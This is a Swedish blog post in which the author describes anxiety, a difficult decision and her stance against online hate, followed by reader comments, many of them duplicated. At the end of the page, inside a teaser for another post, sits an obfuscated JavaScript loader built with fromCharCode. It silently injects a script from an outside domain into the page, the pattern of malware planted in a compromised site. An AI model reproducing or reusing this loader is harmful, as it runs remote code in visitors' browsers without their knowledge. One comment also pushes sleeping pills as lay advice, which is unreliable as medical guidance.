Mamma vecka! Ångest, näthat?!

imageÄlskade unge! Vad vore jag utan dig?! <3 jag älskar dig villkorslöst, nu och för alltid! 

igår eftermiddag hämtade pappa/morfar Lilleman från dagis så att dom fick lite egen tid innan dom kom upp till butiken. Jag har längtat ihjäl mig! Samtidigt som jag oroat mig för om Ludvig ska känna av mitt ”skick”. Men saken är den att han har en lugnande effekt på mig! DEN känslan att bara få hem honom, krama honom… Hårt och länge! <3 det gör gott för själen! 

Vi stannade påvägen hem i Oskarshamn hos våra vänner. lite vad och middag innan vi rullade vidare mot Stocholm. Jag har två dagar här uppe nu. Idag är det möten från morgon till kväll! Allting hänger lixom ihop.

Det mötet jag var på igår var extremt avgörande för min framtid….. Jag tog ett beslut av två. Nu ör det ett beslut kvar att ta. Det som sedan ska leda in mig på ”ett” väg i mitt vägval…

Jag vet och hör hur kryptiskt detta låter. Men just nu är det så. Just nu KAN jag inte skriva mer än så.  Jag berättar när jag kan, får och har tagit beslut 2/2. 

Jag har gråtit så mycket att tårarna borde tagit Slut! Men av nån konstig anledning så tar dom aldrig slut… Men i hjärtat vet jag att detta kommer att göra mig starkare. 

Nu har jag precis pratat med tjejerna i butiken. Lagerenaningen pågår för fullt och dom står redo i butiken 🙂 50% på ALLT! image

just precis nu så kommer strax min samarbetsparter som jag ska ha ett möte med. Sitter på mitt favvo ställe Fresco och dricker kaffe … Samma slitna look som senaste veckorna! Det finns inte en ansiktsmask i världen som kan få ordning på mig Just nu! image

Vill också att du ska veta att jag läser ALLA kommentarerna och mailen även om jg inte svarar. Jag blir verkligen imponerad över hur många det är som vågar dela med sig av sina erfarenheter gällande ångest! Modigt, stort och otroligt Uppskattat! Ångest är inte lätt det ÄR fruktansvärt!

Vad det gäller vissa mindre charmiga kommentarer där man ifrågasätter mig, min trovärdighet, min roll som mamma osv! -fuck off! Att man ställer en fråga, och inte håller med. Helt okay! Men att gå till personangrepp och vara brutalt elak. Det är däremot INTE okay! Just nu är det som att sparka på någon som ligger ner…… -BACKA!

Jag förstår bara inte Vitsen? Jag menar som läsare gör man ett EGET VAL att läsa/följa! Tycker man inte om personen/bloggen läs den inte, följ den inte!?!

Svårare än så är det ju Inte!

Läs istället sånt som gör sig glad och som du tycker om! -eller??? Har jag fel?  Jag säger aktivt NEJ till NÄTHAT!

/My Martens

70 Komentarer

 1. Allvarligt. Tycker du inte själv att en bloggpaus är ett bättre alternativ eftersom du som du säger har ett så svårt beslut att ta? Nu blir din blogg en enda sörja av spekulationer och det sprider sig ju. Såg i något inlägg där det listades namn på alla upptagna karlar du varit på. Inga roliga flickvänner och fruar du retat upp. Red upp dina affärer och gör rent.

  • Och vad ville du tillföra för gott med ditt inlägg Liselotte?
   Nej, lyft varandra istället!
   Kram till er alla som kämpar och en stor eloge till dig My för att du delar med dig❤️ Önskar dig all lycka i det du har framför dig!

  • WHAT?! Hahaha! Nu bjöd du mig iallafall på ett gott skratt!
   Först och främst, en bloggpaus?! Ska jag sticka huvudet i sanden svika mina läsare och min arbetsgivare för att jag mår dåligt? -Nej, det kommer jag inte att göra.
   Alla ör vi olika. Men så funkar inte jag!
   Alla upptagna karlar? VAD pratar du om?! ”Mannen i mitt liv” lyser med sin frånvaro… (Skratt) jag har absolut inte tid för att dejta någon… Det är för mycket runt omkring mig. Jag har tidigare dejtat, absolut…. Men vart fick du dessa upptagna karlar ifrån? Tro mig… Det finns GOTT om singelmän, så det räcker och blir över! Guuuuud vilken konstig kommentar!

   • ja ha ha! Man behöver ju inte vara psykolog för att fatta att det är klar projicering (Liselott eller vad du nu heter, sopa rent din egen trappa före du smutsar ner andras) Stå på dig My, följ ditt hjärta och din passion, då väljer du alltid rätt!

  • Förstår inte alls varför ens lägga ner energi att skriva negativa saker till någon och fattar inte alls vitsen med kommentarer likt denna som du Liselotte skriver.
   Varför är det så svårt för vissa människor att skriva positivt och uppbyggande? Inte undra på att hat sprids i världen när vi inte ens kan hålla sams i en blogg ?
   Hoppas du My känner dig mer på banan snart oavsett vad som trycker o tynger, skickar styrkekramar i mängd så länge KRAAAAAAAAAAAAAAAAAAAAM

  • Säger som Nalle Puh: ”Har man inget snällt att säga är det bättre att vara tyst” – för att få slut på näthatet – sluta att skriva och sprida elakheter! Och retar man sig på det bloggare skriver men så läs inte bloggar då. Svårare är det inte.

 2. Skulle jag vara lika vacker som du i ”slitet tillstånd” så skulle jag vara glad ?
  Kämpa på! Ett av två tagna beslut betyder att du är halvvägs och snart i mål.
  Själva resan innan beslutet är taget brukar vara det som är mest påfrestande.
  När man sedan har ett beslut att förhålla sig till, oavsett vad det är och hur det känns, så brukar det ändå lätta lite, för då har man skalat bort alla andra alternativ som förvirrar och lockar.
  Alltid enklare när man vet vilken väg man ska vandra.
  All lycka till dig och hoppas du snart kan känna ro.

 3. Vad skönt att du har kommit en bit på vägen i dina beslut. En sten som ramlar av dina axlar. Vad gott att din kille har en lugnande effekt + din hund.
  Jag tycker att det är fruktansvärt att läsa en del kommentarer som ifråga sätter dig . Fan rent ut sagt vad vissa kan va elaka. Lätt att sitta bakom en skärm o döma.
  Kram till dig !

 4. Åh hoppas du mår bättre snart! Att du inte åker till din bästis Maggan i Spanien och kopplar av lite. Passa på medan de är kvar ? Kram

 5. Snacka om att det blev totalfel i skriveriet, haha, antar att du skrev via mobilen ? Knasigt men jag förstod ändå vad du försökte skriva. Lite roligt bara.
  Näthat, fattar inte det där, ärligt, det är precis som du säger, läs inte om du inte gillar bloggaren liksom. Men det är människor som behöver få ur sig all skit de bär på inombords, all missnöje och miserabla liv de lever. Det underbara är att vi fortsätter våra liv, vi gör något åt det som är fel och försöker leva vidare på ett bra sätt, medan hatarna bara stannar kvar i allt hat och missnöje i sina liv. Stackars egentligen, ärligt alltså det är fan synd om de. Så mycket hat, så mycket ilska, det kan inte vara lätt och kul att leva deras liv. ?
  Stå på dig fina My, du har stort stöd från oss andra normala och friska individer som ger nätkärlek istället. ?

 6. Det är ju märkligt egentligen kan man tycka. Att man läser en blogg men ogillar vad som sägs i den, hoppar onynanserat på åsikter som framförs, gör egna elaka antaganden osv – dvs sprider näthat. Men jag tror att det till viss del handlar om samma sak som alltid med tjejer. Lita inte på en tjej som säger klipp lugg, lita inte på en tjejkompis som avråder dig att köpa en snygg klänning. Tjejer vill, med undantag såklart, att det ska ska gå liiiite sämre för andra. Så när dessa typer läser om att någon mår dåligt får de blodad tand. De måste läsa, hugga lite och hoppas någonstans att det ska gå dåligt… Det är så extremt ocharmigt! Jag har själv hårt rensat bland kompisar som funkar så, och det är förbaskat skönt. Men på en blogg är det såklart annorlunda. Men handen på hjärtat, ni som sprider näthat, inte ifrågasätter på ett trevligt sätt bara, mår ni inte lite bra när någon mår dåligt? Hoppas ni inte, om ni är ärliga, att det ska gå dåligt för den ni spyr galla över? Jag tror det. Det är därför ni är kvar.
  Och till My kan jag bara säga, jag har varit där. Känslan av att vara innestängd i en mardröm och veta att man inte kan ta sig därifrån. Det blev lättare när jag fick något att förhålla mig till, en sanning och ett beslut. Hoppas att din ångest också lättar då.
  Kram

 7. Allvarligt. Tycker du inte själv att en bloggpaus är ett bättre alternativ eftersom du som du säger har ett så svårt beslut att ta? Nu blir din blogg en enda sörja av spekulationer och det sprider sig ju. Såg i något inlägg där det listades namn på alla upptagna karlar du varit på. Inga roliga flickvänner och fruar du retat upp. Red upp dina affärer och gör rent.

  • Och vad ville du tillföra för gott med ditt inlägg Liselotte?

   Nej, lyft varandra istället!
   Kram till er alla som kämpar och en stor eloge till dig My för att du delar med dig❤️ Önskar dig all lycka i det du har framför dig!

  • WHAT?! Hahaha! Nu bjöd du mig iallafall på ett gott skratt!

   Först och främst, en bloggpaus?! Ska jag sticka huvudet i sanden svika mina läsare och min arbetsgivare för att jag mår dåligt? -Nej, det kommer jag inte att göra.

   Alla ör vi olika. Men så funkar inte jag!

   Alla upptagna karlar? VAD pratar du om?! ”Mannen i mitt liv” lyser med sin frånvaro… (Skratt) jag har absolut inte tid för att dejta någon… Det är för mycket runt omkring mig. Jag har tidigare dejtat, absolut…. Men vart fick du dessa upptagna karlar ifrån? Tro mig… Det finns GOTT om singelmän, så det räcker och blir över! Guuuuud vilken konstig kommentar!

   • ja ha ha! Man behöver ju inte vara psykolog för att fatta att det är klar projicering (Liselott eller vad du nu heter, sopa rent din egen trappa före du smutsar ner andras) Stå på dig My, följ ditt hjärta och din passion, då väljer du alltid rätt!

  • Förstår inte alls varför ens lägga ner energi att skriva negativa saker till någon och fattar inte alls vitsen med kommentarer likt denna som du Liselotte skriver.

   Varför är det så svårt för vissa människor att skriva positivt och uppbyggande? Inte undra på att hat sprids i världen när vi inte ens kan hålla sams i en blogg 😉

   Hoppas du My känner dig mer på banan snart oavsett vad som trycker o tynger, skickar styrkekramar i mängd så länge KRAAAAAAAAAAAAAAAAAAAAM

  • Säger som Nalle Puh: ”Har man inget snällt att säga är det bättre att vara tyst” – för att få slut på näthatet – sluta att skriva och sprida elakheter! Och retar man sig på det bloggare skriver men så läs inte bloggar då. Svårare är det inte.

 8. Skulle jag vara lika vacker som du i ”slitet tillstånd” så skulle jag vara glad 🙂
  Kämpa på! Ett av två tagna beslut betyder att du är halvvägs och snart i mål.
  Själva resan innan beslutet är taget brukar vara det som är mest påfrestande.
  När man sedan har ett beslut att förhålla sig till, oavsett vad det är och hur det känns, så brukar det ändå lätta lite, för då har man skalat bort alla andra alternativ som förvirrar och lockar.
  Alltid enklare när man vet vilken väg man ska vandra.
  All lycka till dig och hoppas du snart kan känna ro.

 9. Vad skönt att du har kommit en bit på vägen i dina beslut. En sten som ramlar av dina axlar. Vad gott att din kille har en lugnande effekt + din hund.
  Jag tycker att det är fruktansvärt att läsa en del kommentarer som ifråga sätter dig . Fan rent ut sagt vad vissa kan va elaka. Lätt att sitta bakom en skärm o döma.
  Kram till dig !

 10. Åh hoppas du mår bättre snart! Att du inte åker till din bästis Maggan i Spanien och kopplar av lite. Passa på medan de är kvar 🙂 Kram

 11. Snacka om att det blev totalfel i skriveriet, haha, antar att du skrev via mobilen 😀 Knasigt men jag förstod ändå vad du försökte skriva. Lite roligt bara.

  Näthat, fattar inte det där, ärligt, det är precis som du säger, läs inte om du inte gillar bloggaren liksom. Men det är människor som behöver få ur sig all skit de bär på inombords, all missnöje och miserabla liv de lever. Det underbara är att vi fortsätter våra liv, vi gör något åt det som är fel och försöker leva vidare på ett bra sätt, medan hatarna bara stannar kvar i allt hat och missnöje i sina liv. Stackars egentligen, ärligt alltså det är fan synd om de. Så mycket hat, så mycket ilska, det kan inte vara lätt och kul att leva deras liv. 🙁

  Stå på dig fina My, du har stort stöd från oss andra normala och friska individer som ger nätkärlek istället. 😀

 12. Sluta absolut aldrig skriva. Du är ett stort stöd med din absoluta ärlighet och öppenhet. Och du är otroligt vacker på bilden!

 13. Fina My, du är så vacker så någon ansiktsmask behövs ej! Ni som skriver och är otrevligs o som ibland går över gränsen vad det gäller förtal? Varför väljer ni inte en blogg som passar er? Men tro mig, ALLA mår dåligt ibland! Bara det att My vågar skriva om det, istället för att sopa allt under mattan. Skärpning tjejer, det räcker nu!
  Hoppas du snart mår lite bättre My o lycka till med ditt val. Du är en klok tjej så allt kommer att bli så bra. Ha det skönt o mys med din son. Styrkekram

 14. Det är ju märkligt egentligen kan man tycka. Att man läser en blogg men ogillar vad som sägs i den, hoppar onynanserat på åsikter som framförs, gör egna elaka antaganden osv – dvs sprider näthat. Men jag tror att det till viss del handlar om samma sak som alltid med tjejer. Lita inte på en tjej som säger klipp lugg, lita inte på en tjejkompis som avråder dig att köpa en snygg klänning. Tjejer vill, med undantag såklart, att det ska ska gå liiiite sämre för andra. Så när dessa typer läser om att någon mår dåligt får de blodad tand. De måste läsa, hugga lite och hoppas någonstans att det ska gå dåligt… Det är så extremt ocharmigt! Jag har själv hårt rensat bland kompisar som funkar så, och det är förbaskat skönt. Men på en blogg är det såklart annorlunda. Men handen på hjärtat, ni som sprider näthat, inte ifrågasätter på ett trevligt sätt bara, mår ni inte lite bra när någon mår dåligt? Hoppas ni inte, om ni är ärliga, att det ska gå dåligt för den ni spyr galla över? Jag tror det. Det är därför ni är kvar.
  Och till My kan jag bara säga, jag har varit där. Känslan av att vara innestängd i en mardröm och veta att man inte kan ta sig därifrån. Det blev lättare när jag fick något att förhålla mig till, en sanning och ett beslut. Hoppas att din ångest också lättar då.
  Kram

 15. Fina My! Brukar sällan läsa kommentarerna du får men gjorde nu ett undantag.Alltså fy sjutton vad elaka saker du tvingas läsa. Hoppas innerligt att du trots att du ej mår bra har styrka att strunta i alla dumheter.Majoriteten av alla som läser skiten inser hur grundlösa och korkade påhoppen är.Du ska vara så stolt över att du har modet att blotta dig i en svår situation. Du hjälper fler än du anar med din öppenhet.Psykiska problem kan drabba vem som helst och är inte ett tecken på svaghet.Sen ska du också veta att du är grymt vacker även när du inte mår bra. Önskar dig och din underbara son en fin sommar.Kram

 16. Hej, jag tycker du ska strunta i alla elaka kommentarer! De är bara avundsjuka och har tid för att se negativt på saker du gör. Jag tycker att du är driven och Duktig ta med dig det! Vet själv hur det är att vara ensamstående de mamma. I är inte det längre men har varit med om mycket saker själv. stå på dig. du kommer ta rätt beslut och då kommer att att finna någon slags ro. Du har ju kommit så långt av en anledning. Tänk på det! ?

 17. Sluta absolut aldrig skriva. Du är ett stort stöd med din absoluta ärlighet och öppenhet. Och du är otroligt vacker på bilden!

 18. Jag brukar heller inte kommentera.
  Men va f_n….
  Det är My’s liv och hennes val.
  Jag har varit utbränd och jag har jobbat i stort sett dygnet runt. Man vet bäst själv vad kroppen klarar av. Och gör man inte det säger den till.
  Så My, fortsätt skriva majoriteten stöttar dig. Och ni som inte gör det SLUTA LÄS!!!
  Jag hoppas så att du kommer finnas ro när dina val till slut är gjorda.
  Min man mår lite som du just nu. Och jag har själv varit där. Så jag tror jag vet hur du mår.
  Skickar en stor kram och ser fram emot att få fortsätta följa dig på din resa. Kram Maria

 19. Fina My, du är så vacker så någon ansiktsmask behövs ej! Ni som skriver och är otrevligs o som ibland går över gränsen vad det gäller förtal? Varför väljer ni inte en blogg som passar er? Men tro mig, ALLA mår dåligt ibland! Bara det att My vågar skriva om det, istället för att sopa allt under mattan. Skärpning tjejer, det räcker nu!
  Hoppas du snart mår lite bättre My o lycka till med ditt val. Du är en klok tjej så allt kommer att bli så bra. Ha det skönt o mys med din son. Styrkekram

 20. Fina My! Brukar sällan läsa kommentarerna du får men gjorde nu ett undantag.Alltså fy sjutton vad elaka saker du tvingas läsa. Hoppas innerligt att du trots att du ej mår bra har styrka att strunta i alla dumheter.Majoriteten av alla som läser skiten inser hur grundlösa och korkade påhoppen är.Du ska vara så stolt över att du har modet att blotta dig i en svår situation. Du hjälper fler än du anar med din öppenhet.Psykiska problem kan drabba vem som helst och är inte ett tecken på svaghet.Sen ska du också veta att du är grymt vacker även när du inte mår bra. Önskar dig och din underbara son en fin sommar.Kram

 21. Hej, jag tycker du ska strunta i alla elaka kommentarer! De är bara avundsjuka och har tid för att se negativt på saker du gör. Jag tycker att du är driven och Duktig ta med dig det! Vet själv hur det är att vara ensamstående de mamma. I är inte det längre men har varit med om mycket saker själv. stå på dig. du kommer ta rätt beslut och då kommer att att finna någon slags ro. Du har ju kommit så långt av en anledning. Tänk på det! 🙂

 22. Jag brukar heller inte kommentera.
  Men va f_n….
  Det är My’s liv och hennes val.
  Jag har varit utbränd och jag har jobbat i stort sett dygnet runt. Man vet bäst själv vad kroppen klarar av. Och gör man inte det säger den till.
  Så My, fortsätt skriva majoriteten stöttar dig. Och ni som inte gör det SLUTA LÄS!!!
  Jag hoppas så att du kommer finnas ro när dina val till slut är gjorda.
  Min man mår lite som du just nu. Och jag har själv varit där. Så jag tror jag vet hur du mår.
  Skickar en stor kram och ser fram emot att få fortsätta följa dig på din resa. Kram Maria

 23. Du är vacker och har en fantastisk ärlig blogg. Så sluta inte blogga o du inte själv vill. Näthat är lågt och vidrigt! Skönt att du mår bättre och att du snart är i hamn med dina beslut.
  Kramar med energi från mej!

 24. Du skriver att du har svåra beslut att ta. Sen är du och en till bloggerskan på samma sajt väldigt snara att ta till att man ska inte kritisera och ifrågasätta. Säger detsamma till dig som till henne Det ÄR vi läsare som är era bloggar för utan oss vore nu inget, men fördenskull ska man inte som läsare vara otrevlig eller gå till personangrepp.Det är fel. Men våra frågor och funderingar får ni kanske lov att ta. Just nu undrar jag om varför du inte ägnar din mammavecka till din son? Varför inte liksom stänga ner resten av livet å allt ståhej då ?

  • Jag håller med dig, frågor är helt okay. Olika åsikter lika så…. Vad menar du? Jag ägnar mig åt Lilleman på mina ”mamma veckor” varför skulle jag inte göra det? ”Stänga ner allt” man kan inte gräva ner sig för att man han en svacka och svåra beslut att ta. Jag minimerar åtaganden och prioriterar det jag verklig måste! Inte mer. Mysfrukost, tidig hämtning, middag och legobygge innan filmkväll och läggning. Imorgon har jag tagit en extra dag ledig för honom. Vad menar DU att jag skulle göra? Såklart svår för dig att först/sätta sig in i våran vardag ?

 25. Hej My förstår att det är tungt, hämta kraft från din lilla pojke, familj o vänner . Skit i alla andra, för mig verkar du ärlig, genuin, snäll o jäkligt snygg. Stå på dig. Allt kommer ordna sig. Kram från Siv

 26. Skickar massor av styrkekramar till dig My <3
  Jag ska hålla tummarna att allt ordnar sig snart för dig

 27. Du är vacker och har en fantastisk ärlig blogg. Så sluta inte blogga o du inte själv vill. Näthat är lågt och vidrigt! Skönt att du mår bättre och att du snart är i hamn med dina beslut.
  Kramar med energi från mej!

 28. Du skriver att du har svåra beslut att ta. Sen är du och en till bloggerskan på samma sajt väldigt snara att ta till att man ska inte kritisera och ifrågasätta. Säger detsamma till dig som till henne Det ÄR vi läsare som är era bloggar för utan oss vore nu inget, men fördenskull ska man inte som läsare vara otrevlig eller gå till personangrepp.Det är fel. Men våra frågor och funderingar får ni kanske lov att ta. Just nu undrar jag om varför du inte ägnar din mammavecka till din son? Varför inte liksom stänga ner resten av livet å allt ståhej då ?

  • Jag håller med dig, frågor är helt okay. Olika åsikter lika så…. Vad menar du? Jag ägnar mig åt Lilleman på mina ”mamma veckor” varför skulle jag inte göra det? ”Stänga ner allt” man kan inte gräva ner sig för att man han en svacka och svåra beslut att ta. Jag minimerar åtaganden och prioriterar det jag verklig måste! Inte mer. Mysfrukost, tidig hämtning, middag och legobygge innan filmkväll och läggning. Imorgon har jag tagit en extra dag ledig för honom. Vad menar DU att jag skulle göra? Såklart svår för dig att först/sätta sig in i våran vardag 🙂

 29. Förstår vad du går igenom, har varit där och kämpat. Ensam med tre underbara tjejer. Och så på något sätt, en dag bara sådär, så är man igenom och vägen ljusnar och det börjar kännas lite lättare för varje steg. Går inte att säga när, bara att det sker, att det kommer att ske och att det är ok att det tar den tid det tar. Det är ok My.

 30. Hej My förstår att det är tungt, hämta kraft från din lilla pojke, familj o vänner . Skit i alla andra, för mig verkar du ärlig, genuin, snäll o jäkligt snygg. Stå på dig. Allt kommer ordna sig. Kram från Siv

 31. Skickar massor av styrkekramar till dig My <3
  Jag ska hålla tummarna att allt ordnar sig snart för dig

 32. Förstår vad du går igenom, har varit där och kämpat. Ensam med tre underbara tjejer. Och så på något sätt, en dag bara sådär, så är man igenom och vägen ljusnar och det börjar kännas lite lättare för varje steg. Går inte att säga när, bara att det sker, att det kommer att ske och att det är ok att det tar den tid det tar. Det är ok My.

 33. Jag tycker du ser superfräsch ut. Keep up the good work och skit i alla negativa personer! Du vet vad som är bäst för dig och din pojke på alla sätt. Kram Anna

 34. Jag tycker du ser superfräsch ut. Keep up the good work och skit i alla negativa personer! Du vet vad som är bäst för dig och din pojke på alla sätt. Kram Anna

 35. Hej ! Jag skrev tidigare om mina sömnproblem, har haft det från och till i ca 6 år. Jag bryter ett par dagar med insomningstabletter, för att få återhämtning. Då sover jag en hel natten och känner mig som en ny människa, jag har jätte respekt för tabletter och beroende som du. MEN sömnen är A och O.. Jag fick mindre panikångest när jag kom i balans med sömnen. Du kanske ska börja med det ist för ångest dämpande , jag har hört olika om såna tabletter, ibland kan det ta tid innan det blir skillnad ( jag har aldrig ätit det själv) Eftersom du sover så dåligt så skulle jag rekommendera att du tar insomningstablett, så att du samlar krafter och orkar med livet som det ser ut nu!
  Stor kram!

 36. Hej ! Jag skrev tidigare om mina sömnproblem, har haft det från och till i ca 6 år. Jag bryter ett par dagar med insomningstabletter, för att få återhämtning. Då sover jag en hel natten och känner mig som en ny människa, jag har jätte respekt för tabletter och beroende som du. MEN sömnen är A och O.. Jag fick mindre panikångest när jag kom i balans med sömnen. Du kanske ska börja med det ist för ångest dämpande , jag har hört olika om såna tabletter, ibland kan det ta tid innan det blir skillnad ( jag har aldrig ätit det själv) Eftersom du sover så dåligt så skulle jag rekommendera att du tar insomningstablett, så att du samlar krafter och orkar med livet som det ser ut nu!
  Stor kram!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/